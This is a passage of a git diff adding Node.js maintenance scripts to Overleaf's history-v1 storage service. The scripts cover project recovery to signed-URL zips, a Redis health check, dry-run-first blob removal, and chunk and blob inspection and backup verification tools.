(core.util.containsNonBmpChars(data)) return null + if (data.indexOf('\x00') !== -1) return null + return data.length +} + +class RecoveryBlobStore { + constructor(historyId, tmp) { + this.historyId = historyId + this.tmp = tmp + this.blobs = new Map() + } + + async fetchBlobs(blobHashes) { + for await (const blobHash of blobHashes) { + await this.fetchBlob(blobHash) + } + } + + async fetchBlob(hash) { + if (this.blobs.has(hash)) return + + if (VERBOSE) console.log('fetching blob', hash) + + const bucketName = config.get('blobStore.projectBucket') + const storage = new Storage() + const [files] = await storage.bucket(bucketName).getFiles({ + prefix: this.makeProjectBlobKey(hash), + versions: true, + }) + + const destination = this.getBlobPathname(hash) + + if (files.length === 0) { + await this.fetchGlobalBlob(hash, destination) + } else if (files.length === 1) { + await files[0].download({ destination }) + } else { + throw new Error('Multiple versions of blob ' + hash) + } + + this.blobs.set(hash, await this.makeBlob(hash, destination)) + } + + async fetchGlobalBlob(hash, destination) { + const bucketName = config.get('blobStore.globalBucket') + const storage = new Storage() + const file = storage.bucket(bucketName).file(this.makeGlobalBlobKey(hash)) + await file.download({ destination }) + } + + async makeBlob(hash, pathname) { + const stat = await fs.promises.stat(pathname) + const byteLength = stat.size + const stringLength = await getStringLengthOfFile(byteLength, pathname) + return new core.Blob(hash, byteLength, stringLength) + } + + async getString(hash) { + const stream = await this.getStream(hash) + const buffer = await streams.readStreamToBuffer(stream) + return buffer.toString() + } + + async getStream(hash) { + return fs.createReadStream(this.getBlobPathname(hash)) + } + + async getBlob(hash) { + return this.blobs.get(hash) + } + + getBlobPathname(hash) { + return path.join(this.tmp, hash) + } + + makeGlobalBlobKey(hash) { + return `${hash.slice(0, 2)}/${hash.slice(2, 4)}/${hash.slice(4)}` + } + + makeProjectBlobKey(hash) { + return `${projectKey.format(this.historyId)}/${hash.slice( + 0, + 2 + )}/${hash.slice(2)}` + } +} + +async function uploadZip(historyId, zipPathname) { + const bucketName = config.get('zipStore.bucket') + const deadline = 24 * 3600 * 1000 // lifecycle limit on the zips bucket + const storage = new Storage() + const destination = `${historyId}-recovered.zip` + await storage.bucket(bucketName).upload(zipPathname, { destination }) + + const signedUrls = await storage + .bucket(bucketName) + .file(destination) + .getSignedUrl({ + version: 'v4', + action: 'read', + expires: Date.now() + deadline, + }) + + return signedUrls[0] +} + +async function restoreProject(historyId) { + const tmp = await fs.promises.mkdtemp( + path.join(os.tmpdir(), historyId.toString()) + ) + if (VERBOSE) console.log('recovering', historyId, 'in', tmp) + + const latestJsonPathname = await downloadLatestChunk(tmp, historyId) + const blobStore = new RecoveryBlobStore(historyId, tmp) + const chunk = await loadChunk(latestJsonPathname, blobStore) + + const snapshot = chunk.getSnapshot() + for (const change of chunk.getChanges()) { + change.applyTo(snapshot) + } + + if (VERBOSE) console.log('zipping', historyId) + + const zipPathname = path.join(tmp, `${historyId}.zip`) + const zipTimeoutMs = 60 * 1000 + const archive = new ProjectArchive(snapshot, zipTimeoutMs) + await archive.writeZip(blobStore, zipPathname) + + if (VERBOSE) console.log('uploading', historyId) + + return await uploadZip(historyId, zipPathname) +} + +async function main() { + for (const historyId of HISTORY_IDS) { + const signedUrl = await restoreProject(historyId) + console.log(signedUrl) + } +} +main().catch(console.error) diff --git a/services/history-v1/storage/scripts/redis.mjs b/services/history-v1/storage/scripts/redis.mjs new file mode 100644 index 0000000..ce9a398 --- /dev/null +++ b/services/history-v1/storage/scripts/redis.mjs @@ -0,0 +1,36 @@ +import redis from '@overleaf/redis-wrapper' +import config from 'config' + +// Get allowed Redis dbs from config +const redisConfig = config.get('redis') +const allowedDbs = Object.keys(redisConfig) + +// Get the Redis db from command line argument or use the first available db as default +const db = process.argv[2] + +// Validate redis db +if (!allowedDbs.includes(db)) { + if (db) { + console.error('Invalid redis db:', db) + } + console.error(`Usage: node redis.mjs [${allowedDbs.join('|')}]`) + process.exit(1) +} + +// Get redis options based on command line argument +const redisOptions = config.get(`redis.${db}`) +console.log('Using redis db:', db) +console.log('REDIS CONFIG', { + ...redisOptions, + password: '*'.repeat(redisOptions.password?.length), +}) +const rclient = redis.createClient(redisOptions) + +try { + await rclient.healthCheck() + console.log('REDIS HEALTHCHECK SUCCEEDED') +} catch (error) { + console.error('REDIS HEALTHCHECK FAILED', error) +} finally { + await rclient.quit() +} diff --git a/services/history-v1/storage/scripts/remove_backed_up_blobs.mjs b/services/history-v1/storage/scripts/remove_backed_up_blobs.mjs new file mode 100644 index 0000000..0fa7201 --- /dev/null +++ b/services/history-v1/storage/scripts/remove_backed_up_blobs.mjs @@ -0,0 +1,104 @@ +// @ts-check +import { readFileSync } from 'node:fs' +import commandLineArgs from 'command-line-args' +import { client } from '../lib/mongodb.js' +import { + getBackedUpBlobHashes, + unsetBackedUpBlobHashes, +} from '../lib/backup_store/index.js' + +let gracefulShutdownInitiated = false + +// Parse command line arguments +const args = commandLineArgs([ + { name: 'input', type: String, alias: 'i', defaultOption: true }, + { name: 'commit', type: Boolean, default: false }, +]) + +if (!args.input) { + console.error( + 'Usage: node remove_backed_up_blobs.mjs --input <csv-file> [--commit]' + ) + process.exit(1) +} + +if (!args.commit) { + console.log('Running in dry-run mode. Use --commit to apply changes.') +} + +// Signal handling +process.on('SIGINT', handleSignal) +process.on('SIGTERM', handleSignal) + +function handleSignal() { + console.warn('Graceful shutdown initiated') + gracefulShutdownInitiated = true +} + +// Process CSV and remove blobs +async function main() { + const projectBlobs = new Map() + const lines = readFileSync(args.input, 'utf8').split('\n') + const SHA1_HEX_REGEX = /^[a-f0-9]{40}$/ + + // Skip header + for (const line of lines.slice(1)) { + if (!line.trim() || gracefulShutdownInitiated) break + + const [projectId, path] = line.split(',') + const pathParts = path.split('/') + const hash = pathParts[3] + pathParts[4] + + if (!SHA1_HEX_REGEX.test(hash)) { + console.warn(`Invalid SHA1 hash for project ${projectId}: ${hash}`) + continue + } + + if (!projectBlobs.has(projectId)) { + projectBlobs.set(projectId, new Set()) + } + projectBlobs.get(projectId).add(hash) + } + + // Process each project + for (const [projectId, hashes] of projectBlobs) { + if (gracefulShutdownInitiated) break + + if (!args.commit) { + console.log( + `DRY-RUN: would remove ${hashes.size} blobs from project ${projectId}` + ) + continue + } + + try { + const originalHashes = await getBackedUpBlobHashes(projectId) + if (originalHashes.size === 0) { + continue + } + const result = await unsetBackedUpBlobHashes( + projectId, + Array.from(hashes) + ) + if (result) { + console.log( + `Project ${projectId}: want to remove ${hashes.size}, removed ${originalHashes.size - result.blobs.length}, ${result.blobs.length} remaining` + ) + } + } catch (err) { + console.error(`Error updating project ${projectId}:`, err) + } + } +} + +// Run the script +main() + .catch(err => { + console.error('Fatal error:', err) + process.exitCode = 1 + }) + .finally(() => { + client + .close() + .catch(err => console.error('Error closing MongoDB connection:', err)) + }) diff --git a/services/history-v1/storage/scripts/remove_backup_blobs_from_wrong_path.mjs b/services/history-v1/storage/scripts/remove_backup_blobs_from_wrong_path.mjs new file mode 100644 index 0000000..119da2f --- /dev/null +++ b/services/history-v1/storage/scripts/remove_backup_blobs_from_wrong_path.mjs @@ -0,0 +1,221 @@ +// @ts-check + +/** + * This script is used to remove blobs that have been backed up under the project ID + * instead of the history ID (where those are different). + * + * This script reads a CSV file with the following format: + * ``` + * project_id,hash + * <mongo ID>,<hash> + * ``` + * + * The header row is optional. All rows will be checked for conformance to the format. + */ + +import commandLineArgs from 'command-line-args' +import { backupPersistor, projectBlobsBucket } from '../lib/backupPersistor.mjs' +import { makeProjectKey } from '../lib/blob_store/index.js' +import fs from 'node:fs' +import assert from '../lib/assert.js' +import { client } from '../lib/mongodb.js' +import { verifyBlobs } from '../lib/backupVerifier.mjs' +import { setTimeout } from 'node:timers/promises' +import { getHistoryId } from '../lib/backup_store/index.js' + +const argsSchema = [ + { + name: 'input', + type: String, + }, + { + name: 'commit', + type: Boolean, + }, + { + name: 'header', + type: Boolean, + }, + { + name: 'force', + type: Boolean, + }, + { + name: 'verbose', + type: Boolean, + }, +] + +const args = commandLineArgs(argsSchema) + +async function gracefulClose(code = 0) { + await client.close() + process.exit(code) +} + +/** + * + * @param {(value: unknown) => void} fn + * @param {unknown} value + * @return {boolean} + */ +function not(fn, value) { + try { + fn(value) + return false + } catch { + return true + } +} + +/** + * + * @param {string} row + * @return {{projectId: string, hash: string}} + */ +function parseCSVRow(row) { + const [projectId, hash] = row.split(',') + assert.mongoId(projectId, `invalid projectId ${projectId}`) + assert.blobHash(hash, `invalid hash ${hash}`) + return { projectId, hash } +} + +/** + * + * @param {string} path + * @param {boolean} hasHeader + * @return {AsyncGenerator<{projectId: string, hash: string}, void, *>} + */ +async function* readCSV(path, hasHeader) { + let seenHeader = !hasHeader + let fh + try { + fh = await fs.promises.open(path, 'r') + } catch (error) { + console.error(`Could not open file: ${error}`) + return await gracefulClose(1) + } + for await (const line of fh.readLines()) { + if (!seenHeader) { + const [first, second] = line.split(',') + const noDataInHeader = + not(assert.mongoId, first) && not(assert.blobHash, second) + if (!noDataInHeader) { + console.error('Data found in header row') + return await gracefulClose(1) + } + seenHeader = true + continue + } + try { + yield parseCSVRow(line) + } catch (error) { + console.error(error instanceof Error ? error.message : error) + console.info(`Skipping invalid row: ${line}`) + } + } +} + +function usage() { + console.info( + 'Usage: remove_blobs_from_backup.mjs --input <path> [--commit] [--header] [--force] [--verbose]' + ) +} + +if (!args.input) { + console.error('--input was missing') + usage() + await gracefulClose(1) +} + +/** + * + * @param {string} projectId + * @param {string} hash + * @return {Promise<void>} + */ +async function deleteBlob(projectId, hash) { + const path = makeProjectKey(projectId, hash) + if (args.commit) { + await backupPersistor.deleteObject(projectBlobsBucket, path) + } else { + console.log(`DELETE: ${path}`) + } +} + +/** + * + * @param {string} projectId + * @param {string} hash + * @return {Promise<void>} + */ +async function canDeleteBlob(projectId, hash) { + let historyId + try { + historyId = await getHistoryId(projectId) + } catch (error) { + if (args.verbose) { + console.error(error) + } + throw new Error(`No history ID found for project ${projectId}, skipping`) + } + if (historyId === projectId) { + throw new Error( + `Project ID and history ID are the same for ${projectId} - use --force to delete anyway` + ) + } + + // TODO: fix assert.postgresId to handle integers better and then stop coercing to string below + assert.postgresId( + `${historyId}`, + `History ID ${historyId} does not appear to be for a postgres project` + ) + + try { + await verifyBlobs(`${historyId}`, [hash]) + } catch (error) { + if (args.verbose) { + console.error(error) + } + throw new Error( + `Blob ${hash} is not backed up for project ${projectId} - use --force to delete anyway` + ) + } +} + +if (!args.commit) { + console.log('DRY RUN: provide --commit to perform operations') +} + +if (args.force) { + console.log( + 'WARNING: --force is enabled, blobs will be deleted regardless of backup status' + ) + await setTimeout(5_000) +} + +let deleted = 0 +let errors = 0 + +for await (const { projectId, hash } of readCSV(args.input, args.header)) { + if (!args.force) { + try { + await canDeleteBlob(projectId, hash) + } catch (error) { + console.error(error instanceof Error ? error.message : error) + continue + } + } + try { + await deleteBlob(projectId, hash) + deleted++ + } catch (error) { + errors++ + console.error(error) + } +} + +console.log(`Deleted: ${deleted}`) +console.log(`Errors: ${errors}`) + +await gracefulClose() diff --git a/services/history-v1/storage/scripts/show.mjs b/services/history-v1/storage/scripts/show.mjs new file mode 100644 index 0000000..b4ae166 --- /dev/null +++ b/services/history-v1/storage/scripts/show.mjs @@ -0,0 +1,254 @@ +import commandLineArgs from 'command-line-args' +import { + loadAtVersion, + getChunkMetadataForVersion, + getProjectChunksFromVersion, +} from '../lib/chunk_store/index.js' +import { client } from '../lib/mongodb.js' +import knex from '../lib/knex.js' +import redis from '../lib/redis.js' +import { + loadGlobalBlobs, + BlobStore, + makeProjectKey, +} from '../lib/blob_store/index.js' +import { TextDecoder } from 'node:util' +import { + backupPersistor, + chunksBucket, + projectBlobsBucket, +} from '../lib/backupPersistor.mjs' +import fs from 'node:fs' +import { pipeline } from 'node:stream/promises' +import os from 'node:os' +import path from 'node:path' +import { createHash } from 'node:crypto' +import projectKey from '../lib/project_key.js' +import { createGunzip } from 'node:zlib' +import { text } from 'node:stream/consumers' + +const optionDefinitions = [ + { name: 'historyId', alias: 'p', type: String }, + { name: 'version', alias: 'v', type: Number }, + { name: 'blob', alias: 'b', type: String }, + { name: 'remote', alias: 'r', type: Boolean }, + { name: 'keep', alias: 'k', type: Boolean }, +] + +function makeChunkKey(projectId, startVersion) { + return path.join(projectKey.format(projectId), projectKey.pad(startVersion)) +} + +async function listChunks(historyId) { + for await (const chunkRecord of getProjectChunksFromVersion(historyId, 0)) { + console.log('Chunk record:', chunkRecord) + } +} + +async function fetchChunkLocal(historyId, version) { + const chunkRecord = await getChunkMetadataForVersion(historyId, version) + const chunk = await loadAtVersion(historyId, version) + return { key: version, chunk, metadata: chunkRecord, source: 'local storage' } +} + +async function fetchChunkRemote(historyId, version) { + const chunkRecord = await getChunkMetadataForVersion(historyId, version) + const startVersion = chunkRecord.startVersion + const key = makeChunkKey(historyId, startVersion) + const backupPersistorForProject = await backupPersistor.forProject( + chunksBucket, + key + ) + const backupChunkStream = await backupPersistorForProject.getObjectStream( + chunksBucket, + key + ) + const backupStr = await text(backupChunkStream.pipe(createGunzip())) + return { + key, + chunk: JSON.parse(backupStr), + metadata: chunkRecord, + source: 'remote backup', + } +} + +async function displayChunk(historyId, version, options) { + const { key, chunk, metadata, source } = await (options.remote + ? fetchChunkRemote(historyId, version) + : fetchChunkLocal(historyId, version)) + console.log('Source:', source) + console.log('Chunk record', metadata) + console.log('Key', key) + // console.log('Number of changes', chunk.getChanges().length) + console.log(JSON.stringify(chunk)) +} + +async function fetchBlobRemote(historyId, blobHash) { + const backupPersistorForProject = await backupPersistor.forProject( + projectBlobsBucket, + makeProjectKey(historyId, '') + ) + const blobKey = makeProjectKey(historyId, blobHash) + return { + stream: await backupPersistorForProject.getObjectStream( + projectBlobsBucket, + blobKey, + { autoGunzip: true } + ), + metadata: { hash: blobHash }, + source: 'remote backup', + } +} + +async function fetchBlobLocal(historyId, blobHash) { + const blobStore = new BlobStore(historyId) + const blob = await blobStore.getBlob(blobHash) + if (!blob) throw new Error(`Blob ${blobHash} not found`) + return { + stream: await blobStore.getStream(blobHash), + metadata: blob, + source: 'local storage', + } +} + +async function displayBlobContent(filepath, metadata, source, blobHash) { + console.log('Source:', source) + console.log('Blob metadata:', metadata) + + // Compute git hash using streaming + const stat = fs.statSync(filepath) + const header = `blob ${stat.size}\0` + const hash = createHash('sha1') + hash.update(header) + + const hashStream = fs.createReadStream(filepath) + for await (const chunk of hashStream) { + hash.update(chunk) + } + const gitHash = hash.digest('hex') + + // Check content type and display preview + const fd = fs.openSync(filepath, 'r') + try { + const headBuf = Buffer.alloc(16) + const tailBuf = Buffer.alloc(16) + + try { + // Stream through TextDecoderStream to check for valid UTF-8 + const textStream = fs.createReadStream(filepath) + const decoder = new TextDecoder('utf-8', { fatal: true }) + for await (const chunk of textStream) { + decoder.decode(chunk, { stream: true }) + } + decoder.decode() + // If we get here, it's valid UTF-8 + if (stat.size <= 1024) { + console.log('Content (text):', await fs.readFileSync(filepath, 'utf8')) + } else { + console.log('Content (text, truncated):') + console.log(` Length: ${stat.size} bytes`) + fs.readSync(fd, headBuf, 0, 16, 0) + fs.readSync(fd, tailBuf, 0, 16, stat.size - 16) + console.log( + ' Content:', + headBuf.toString('utf8') + + ' ...(truncated)... ' + + tailBuf.toString('utf8') + ) + } + } catch (e) { + // Binary content - show head and tail + console.log('Content (binary):') + console.log(` Length: ${stat.size} bytes`) + + if (stat.size <= 32) { + // Small file - read it all + const buf = Buffer.alloc(stat.size) + fs.readSync(fd, buf, 0, stat.size, 0) + const hexBytes = buf.toString('hex').match(/../g).join(' ') + console.log(' Bytes:', hexBytes) + } else { + // Read tail for large files + fs.readSync(fd, headBuf, 0, 16, 0) + fs.readSync(fd, tailBuf, 0, 16, stat.size - 16) + const headHex = headBuf.toString('hex').match(/../g).join(' ') + const tailHex = tailBuf.toString('hex').match(/../g).join(' ') + console.log(' Bytes:', headHex + ' ... ' + tailHex) + } + console.log(' Git-style SHA1:', gitHash) + if (gitHash !== blobHash) { + console.log(' Warning: Git hash differs from blob hash!\x1b[0m') + console.log(' Blob hash:', blobHash) + } + } + } finally { + fs.closeSync(fd) + } +} + +async function withTempDir(prefix, fn, options = {}) { + const tmpDir = fs.mkdtempSync(path.join(os.tmpdir(), prefix)) + try { + return await Promise.resolve(fn(tmpDir)) + } finally { + if (!options.keep) { + fs.rmSync(tmpDir, { recursive: true, force: true }) + } else { + console.log('Keeping temporary file:', path.join(tmpDir, 'blob')) + } + } +} + +async function displayBlob(historyId, blobHash, options) { + try { + const { stream, metadata, source } = await (options.remote + ? fetchBlobRemote(historyId, blobHash) + : fetchBlobLocal(historyId, blobHash)) + + await withTempDir( + 'blob-show-', + async tmpDir => { + const tmpPath = path.join(tmpDir, 'blob') + await pipeline(stream, fs.createWriteStream(tmpPath)) + await displayBlobContent(tmpPath, metadata, source, blobHash) + }, + { keep: options.keep } + ) + } catch (err) { + if (err.code === 'NoSuchKey') { + throw new Error(`Blob ${blobHash} not found in backup`) + } + throw err + } +} + +async function main() { + const { historyId, version, blob, remote, keep } = + commandLineArgs(optionDefinitions) + if (!historyId) { + console.error('Error: --historyId is required.') + process.exit(1) + } + await loadGlobalBlobs() + if (version != null) { + await displayChunk(historyId, version, { remote }) + } else if (blob != null) { + await displayBlob(historyId, blob, { remote, keep }) + } else { + await listChunks(historyId) + } +} + +main() + .then(() => console.log('Done.')) + .catch(err => { + console.error('Error:', err) + process.exit(1) + }) + .finally(() => { + knex.destroy().catch(err => console.error('Error closing Postgres:', err)) + client.close().catch(err => console.error('Error closing MongoDB:', err)) + redis + .disconnect() + .catch(err => console.error('Error disconnecting Redis:', err)) + }) diff --git a/services/history-v1/storage/scripts/verify_backed_up_blobs.mjs b/services/history-v1/storage/scripts/verify_backed_up_blobs.mjs new file mode 100644 index 0000000..257238a --- /dev/null +++ b/services/history-v1/storage/scripts/verify_backed_up_blobs.mjs @@ -0,0 +1,153 @@ +// @ts-check +import { ObjectId } from 'mongodb' +import knex from '../lib/knex.js' +import { + batchedUpdate, + objectIdFromInput, + READ_PREFERENCE_SECONDARY, +} from '@overleaf/mongo-utils/batchedUpdate.js' +import { + GLOBAL_BLOBS, + loadGlobalBlobs, + makeProjectKey, +} from '../lib/blob_store/index.js' +import { + backedUpBlobs as backedUpBlobsCollection, + db, + client, +} from '../lib/mongodb.js' +import redis from '../lib/redis.js' +import commandLineArgs from 'command-line-args' +import fs from 'node:fs' + +const projectsCollection = db.collection('projects') + +// Enable caching for ObjectId.toString() +ObjectId.cacheHexString = true + +function parseArgs() { + const PUBLIC_LAUNCH_DATE = new Date('2012-01-01T00:00:00Z') + const args = commandLineArgs([ + { + name: 'BATCH_RANGE_START', + type: String, + defaultValue: PUBLIC_LAUNCH_DATE.toISOString(), + }, + { + name: 'BATCH_RANGE_END', + type: String, + defaultValue: new Date().toISOString(), + }, + { + name: 'output', + type: String, + alias: 'o', + }, + ]) + const BATCH_RANGE_START = objectIdFromInput( + args['BATCH_RANGE_START'] + ).toString() + const BATCH_RANGE_END = objectIdFromInput(args['BATCH_RANGE_END']).toString() + if (!args['output']) { + throw new Error('missing --output') + } + const OUTPUT_STREAM = fs.createWriteStream(args['output']) + + return { + BATCH_RANGE_START, + BATCH_RANGE_END, + OUTPUT_STREAM, + } +} + +const { BATCH_RANGE_START, BATCH_RANGE_END, OUTPUT_STREAM } = parseArgs() + +// We need to handle the start and end differently as ids of deleted projects are created at time of deletion. +if (process.env.BATCH_RANGE_START || process.env.BATCH_RANGE_END) { + throw new Error('use --BATCH_RANGE_START and --BATCH_RANGE_END') +} + +let gracefulShutdownInitiated = false + +process.on('SIGINT', handleSignal) +process.on('SIGTERM', handleSignal) + +function handleSignal() { + gracefulShutdownInitiated = true + console.warn('graceful shutdown initiated, draining queue') +} + +async function processBatch(batch) { + if (gracefulShutdownInitiated) { + throw new Error('graceful shutdown: aborting batch processing') + } + + const N = batch.length + const firstId = batch[0]._id + const lastId = batch[N - 1]._id + const projectCursor = await projectsCollection.find( + { _id: { $gte: firstId, $lte: lastId } }, + { + projection: { _id: 1, 'overleaf.history.id': 1, lastUpdated: 1 }, + readPreference: READ_PREFERENCE_SECONDARY, + } + ) + const projectMap = new Map() + for await (const project of projectCursor) { + projectMap.set(project._id.toString(), project) + } + for (const project of batch) { + const projectId = project._id.toString() + const projectRecord = projectMap.get(projectId) + if (!projectRecord) { + console.error(`project not found: ${projectId}`) + continue + } + if (!projectRecord.overleaf?.history?.id) { + console.error(`project missing history: ${projectId}`) + continue + } + const historyId = projectRecord.overleaf.history.id.toString() + const prefix = `${projectId},${projectRecord.lastUpdated.toISOString()},` + const hashes = project.blobs.map(blob => blob.toString('hex')) + const projectBlobHashes = hashes.filter(hash => !GLOBAL_BLOBS.has(hash)) + if (projectBlobHashes.length < hashes.length) { + console.warn( + `project ${projectId} has ${hashes.length - projectBlobHashes.length} global blobs` + ) + } + const rows = projectBlobHashes.map( + hash => prefix + makeProjectKey(historyId, hash) + '\n' + ) + OUTPUT_STREAM.write(rows.join('')) + } +} + +async function main() { + await loadGlobalBlobs() + OUTPUT_STREAM.write('projectId,lastUpdated,path\n') + await batchedUpdate( + backedUpBlobsCollection, + {}, + processBatch, + {}, + {}, + { BATCH_RANGE_START, BATCH_RANGE_END } + ) +} + +main() + .then(() => console.log('Done.')) + .catch(err => { + console.error('Error:', err) + process.exitCode = 1 + }) + .finally(() => { + knex.destroy().catch(err => { + console.error('Error closing Postgres connection:', err) + }) + client.close().catch(err => console.error('Error closing MongoDB:', err)) + redis.disconnect().catch(err => { + console.error('Error disconnecting Redis:', err) + }) + }) diff --git a/services/history-v1/storage/scripts/verify_backup_blob.mjs b/services/history-v1/storage/scripts/verify_backup_blob.mjs new file mode 100644 index 0000000..504f907 --- /dev/null +++ b/services/history-v1/storage/scripts/verify_backup_blob.mjs @@ -0,0 +1,21 @@ +import logger from '@overleaf/logger' +import commandLineArgs from 'command-line-args' +import { verifyBlobs } from '../lib/backupVerifier.mjs' + +const { historyId, hashes } = commandLineArgs([ + { name: 'historyId', type: String }, + { name: 'hashes', type: String, multiple: true, defaultOption: true }, +]) + +if (hashes.length === 0) { + throw new Error('missing --hashes flag') +} + +try { + await verifyBlobs(historyId, hashes) + console.log('OK') + process.exit(0) +} catch (err) { + logger.err({ err }, 'failed to verify blob') + process.exit(1) +} diff --git a/services/history-v1/storage/scripts/verify_blob_backed_up_by_path_bulk.mjs b/services/history-v1/storage/scripts/verify_blob_backed_up_by_path_bulk.mjs new file mode 100644 index 0000000..c699b61 --- /dev/null +++ b/services/history-v1/storage/scripts/verify_blob_backed_up_by_path_bulk.mjs @@ -0,0 +1,177 @@ +import fs from 'node:fs' +import { makeProjectKey } from '../lib/blob_store/index.js' +import { backupPersistor, projectBlobsBucket } from '../lib/backupPersistor.mjs' +import { NotFoundError } from '@overleaf/object-persistor/src/Errors.js' +import commandLineArgs from 'command-line-args' +import OError from '@overleaf/o-error' +import assert from '../lib/assert.js' +import { client, projects } from '../lib/mongodb.js' +import { ObjectId } from 'mongodb' +import { setTimeout } from 'node:timers/promises' + +const { input, verbose } = commandLineArgs([ + { name: 'input', type: String }, + { name: 'verbose', type: Boolean, defaultValue: false }, +]) + +function parseCSVRow(row) { + const [path] = row.split(',') + const pathSegments = path.split('/') + const historyId = `${pathSegments[0]}${pathSegments[1]}${pathSegments[2]}` + .split('') + .reverse() + .join('') + + return { historyId, path, hash: `${pathSegments[3]}${pathSegments[4]}` } +} + +async function* readCSV(path) { + let fh + try { + fh = await fs.promises.open(path, 'r') + } catch (error) { + console.error(`Could not open file: ${error}`) + throw error + } + for await (const line of fh.readLines()) { + try { + const row = parseCSVRow(line) + yield row + } catch (error) { + console.error(error instanceof Error ? error.message : error) + console.log(`Skipping invalid row: ${line}`) + } + } +} + +class MissingDEKError extends OError {} +class InvalidHistoryIdError extends OError {} +class MissingProjectError extends OError {} +class MissingBlobError extends OError {} + +async function getProjectPersistor(historyId) { + try { + return await backupPersistor.forProjectRO( + projectBlobsBucket, + makeProjectKey(historyId, '') + ) + } catch (err) { + if (err instanceof NotFoundError) { + throw new MissingDEKError('dek does not exist', { historyId }, err) + } + throw err + } +} + +async function checkBlobExists(path, historyId) { + const persistor = await getProjectPersistor(historyId) + return await persistor.getObjectSize(projectBlobsBucket, path) +} + +let total = 0 +const errors = { + invalidProjectId: 0, + notBackedUpProjectId: 0, + missingBlob: 0, + notInMongo: 0, + unknown: 0, +} + +const notInMongoProjectIds = new Set() +const notBackedUpProjectIds = new Set() + +let stopping = false + +process.on('SIGTERM', () => { + console.log('SIGTERM received') + stopping = true +}) + +process.on('SIGINT', () => { + console.log('SIGINT received') + stopping = true +}) + +/** + * + * @param {string} historyId + * @param {string} path + * @param {string} hash + * @return {Promise<void>} + */ +async function checkPath(historyId, path, hash) { + try { + assert.mongoId(historyId) + } catch (error) { + throw InvalidHistoryIdError('invalid history id', { historyId }) + } + if (notInMongoProjectIds.has(historyId)) { + throw new MissingProjectError('project not in mongo', { historyId }) + } + if (notBackedUpProjectIds.has(historyId)) { + throw new MissingDEKError('project not backed up', { historyId }) + } + + const project = await projects.findOne({ _id: new ObjectId(historyId) }) + if (!project) { + notInMongoProjectIds.add(historyId) + throw new MissingProjectError('project not in mongo', { historyId }) + } + try { + await checkBlobExists(path, historyId) + } catch (error) { + if (error instanceof NotFoundError) { + throw new MissingBlobError('missing blob', { historyId, hash }) + } + if (error instanceof MissingDEKError) { + notBackedUpProjectIds.add(historyId) + } + throw error + } +} + +for await (const line of readCSV(input)) { + if (stopping) break + total++ + if (total % 10_000 === 0) { + console.log(`checked ${total}`) + } + const { historyId, path, hash } = line + try { + await checkPath(historyId, path, hash) + if (verbose) { + console.log(`✓ Project ${historyId} has ${hash} backed up`) + } + } catch (error) { + if (error instanceof InvalidHistoryIdError) { + errors.invalidProjectId++ + console.warn(`invalid historyId ${historyId}`) + continue + } else if (error instanceof MissingProjectError) { + errors.notInMongo++ + console.warn(`✗ project ${historyId} not in mongo`) + continue + } else if (error instanceof MissingDEKError) { + errors.notBackedUpProjectId++ + console.error(`✗ Project DEK ${historyId} not found`) + continue + } else if (error instanceof MissingBlobError) { + errors.missingBlob++ + console.error(`✗ missing blob ${hash} from project ${historyId}`) + continue + } + errors.unknown++ + console.error(error) + } +} + +console.log(`total checked: ${total}`) +console.log(`invalid project id: ${errors.invalidProjectId}`) +console.log(`not found in mongo: ${errors.notInMongo}`) +console.log(`missing blob: ${errors.missingBlob}`) +console.log(`project not backed up: ${errors.notBackedUpProjectId}`) +console.log(`unknown errors: ${errors.unknown}`) + +await client.close() +await setTimeout(100) +process.exit() diff --git a/services/history-v1/storage/scripts/verify_project.mjs b/services/history-v1/storage/scripts/verify_project.mjs new file mode 100644 index 0000000..3c26f9b --- /dev/null +++ b/services/history-v1/storage/scripts/verify_project.mjs @@ -0,0 +1,35 @@ +import commandLineArgs from 'command-line-args' +import { verifyProjectWithErrorContext } from '../lib/backupVerifier.mjs' +import knex from '../lib/knex.js' +import { client } from '../lib/mongodb.js' +import redis from '../lib/redis.js' +import { setTimeout } from 'node:timers/promises' +import { loadGlobalBlobs } from '../lib/blob_store/index.js' + +const { historyId } = commandLineArgs([{ name: 'historyId', type: String }]) + +async function gracefulShutdown(code = process.exitCode) { + await knex.destroy() + await client.close() + await redis.disconnect() + await setTimeout(1_000) + process.exit(code) +} + +if (!historyId) { + console.error('missing --historyId') + process.exitCode = 1 + await gracefulShutdown() +} + +await loadGlobalBlobs() + +try { + await verifyProjectWithErrorContext(historyId) + console.log('OK') +} catch (error) { + console.error('error verifying', error) + process.exitCode = 1 +} finally { + await gracefulShutdown() +} diff --git a/services/history-v1/storage/scripts/verify_sampled_projects.mjs b/services/history-v1/storage/scripts/verify_sampled_projects.mjs new file mode 100644 index 0000000..a74a8b9 --- /dev/null +++ b/services/history-v1/storage/scripts/verify_sampled_projects.mjs @@ -0,0 +1,217 @@ +// @ts-check +import commandLineArgs from 'command-line-args' +import { + setWriteMetrics, + verifyProjectsCreatedInDateRange, + verifyRandomProjectSample, + verifyProjectsUpdatedInDateRange, +} from '../../backupVerifier/ProjectVerifier.mjs' +import knex from '../lib/knex.js' +import { client } from '../lib/mongodb.js' +import { setTimeout } from 'node:timers/promises' +import logger from '@overleaf/logger' +import { loadGlobalBlobs } from '../lib/blob_store/index.js' +import { getDatesBeforeRPO } from '../../backupVerifier/utils.mjs' +import { EventEmitter } from 'node:events' +import { mongodb } from '../index.js' +import redis from '../lib/redis.js' + +logger.logger.level('fatal') + +const usageMessage = [ + 'Usage: node verify_sampled_projects.mjs [--startDate <start>] [--endDate <end>] [--nProjects <n>] [--verbose] [--usage] [--writeMetrics] [--concurrency <n>] [--strategy <range|random>]', + 'strategy: defaults to "range"; startDate and endDate are required for "range" strategy', +].join('\n') + +/** + * Gracefully shutdown the process + * @param code + * @return {Promise<void>} + */ +async function gracefulShutdown(code = process.exitCode) { + await knex.destroy() + await client.close() + await redis.disconnect() + await setTimeout(1_000) + process.exit(code) +} + +const STATS = { + verifiable: 0, + unverifiable: 0, +} + +/** + * @typedef {Object} CLIOptions + * @property {(signal: EventEmitter) => Promise<VerificationJobStatus>} projectVerifier + * @property {boolean} verbose + */ + +/** + * @typedef {import('../../backupVerifier/types.d.ts').VerificationJobStatus} VerificationJobStatus + */ + +/** + * + * @return {CLIOptions} + */ +function getOptions() { + const { + startDate, + endDate, + concurrency, + writeMetrics, + verbose, + nProjects, + strategy, + usage, + } = commandLineArgs([ + { name: 'startDate', type: String }, + { name: 'endDate', type: String }, + { name: 'concurrency', type: Number, defaultValue: 1 }, + { name: 'verbose', type: Boolean, defaultValue: false }, + { name: 'nProjects', type: Number, defaultValue: 10 }, + { name: 'usage', type: Boolean, defaultValue: false }, + { name: 